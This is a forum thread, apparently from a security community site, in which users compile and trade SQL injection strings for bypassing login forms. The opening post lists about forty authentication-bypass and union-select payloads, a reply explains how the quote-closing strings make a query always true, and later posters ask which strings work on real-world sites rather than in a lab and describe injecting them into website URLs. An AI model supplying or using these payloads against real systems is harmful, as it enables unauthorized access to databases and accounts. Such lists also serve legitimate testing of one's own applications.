Government Security
Network Security Resources

Jump to content

Photo

Sql Injection Strings!


  • Please log in to reply
10 replies to this topic

#1 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 14 April 2004 - 01:16 PM

OK well im really starting to dabble in SQL jection', and I need more strings, im trying to make a sort of combo list... If you all post what you got ill make one big list and post it on the board. If you dont know what your doing dont post.... Or alternativly post meathods used to find new strings...

List so far:

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

#2 Blake

Blake

    Former Commander In Chief

  • Retired Admin
  • 7,334 posts

Posted 14 April 2004 - 01:54 PM

Have you seen the list Comsec compiled in his SQL injection tutorial?

#3 Logan

Logan

    Specialist

  • Sergeant Major
  • 1,596 posts

Posted 14 April 2004 - 02:09 PM

i think gsecur was referring to this
http://www.governmen...&st=0


#4 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 14 April 2004 - 02:15 PM

I have but as the description shows "I WANT MORE!" I know there are more as he says "the list below is a sample of the most common used" the above list was made from various tuts... along with new combos of old strings re-ordered..
also I noticed you add ' hi" or 1=1 -- ' would changeing the word have any effect? Maybe trying common usernames?

#5 Logan

Logan

    Specialist

  • Sergeant Major
  • 1,596 posts

Posted 14 April 2004 - 02:25 PM

it's sql... usually if you want to use a vulnerability (open source), you have to learn the language
SQL is simple, learn how exactly it gets read and other possibilities of doing it... then you could make your own!

example
" or "a"="a
') or ('a'='a

on some databases one would work, other wouldn't.. first one would enclose the username (or pass) in quotes... first it would CLOSE the quotes (making it "") and then says.. or "a"="a.. the last quote would be closeing the final a.. and "a"="a" is always true, so that would be how it works
however, the second uses ('Username').. and changing it to say "('') or ('a'='a')"

so to answer your question, YES another word can be put in....


#6 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 14 April 2004 - 02:32 PM

I c I c, sql will be learned, however I probly aint going to get to far into it so agian if you have any diffrent strings please post!

#7 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 18 April 2004 - 02:15 PM

<_< <_< <_< :huh: :o :( :angry:
No ones postin',wait,oooo,damn nope,*pissed*

#8 MonikaLec

MonikaLec

    Private

  • Members
  • 1 posts

Posted 17 April 2012 - 04:54 AM

Hello,
below I am giving you the link to the teaser of a new Hakin9 Magazin in which the main topic is SQL Injection. To download it you have to register on the free account.
Here is the link: http://hakin9.org/wp...load.php?id=221 I hope it is helpful

#9 TerminalX

TerminalX

    Private

  • Members
  • 2 posts

Posted 27 June 2012 - 05:18 AM

Well i appreciate your effort regarding this but have you tried these strings your self to know which of them work and which of them don't? personally iam graping the strings that i assure to work in real world enviroment , not in LAB etc. can you please tell me which ones you tried and they worked?

#10 acu281

acu281

    Private

  • Members
  • 2 posts

Posted 08 March 2013 - 08:53 PM

Well i appreciate your effort regarding this but have you tried these strings your self to know which of them work and which of them don't? personally iam graping the strings that i assure to work in real world enviroment , not in LAB etc. can you please tell me which ones you tried and they worked?

tnx 4 guide

no, i dont try all of them,

because i don't wanna hack a website or fetch informations and like this

actually i work on first step of SQL Injection hacking, and need to test website to understand that website is Vulnerable or no

i clollected my string from a forum and my software gives that string and inject them to website URL after '?'

plz Help! 

tnx :)



#11 acu281

acu281

    Private

  • Members
  • 2 posts

Posted 08 March 2013 - 09:09 PM

LOOOOOOOOOOOOOOL wrong post :))))

but not matter,

like Eyeless i'm working on sql injection and i think we hase same problem






1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users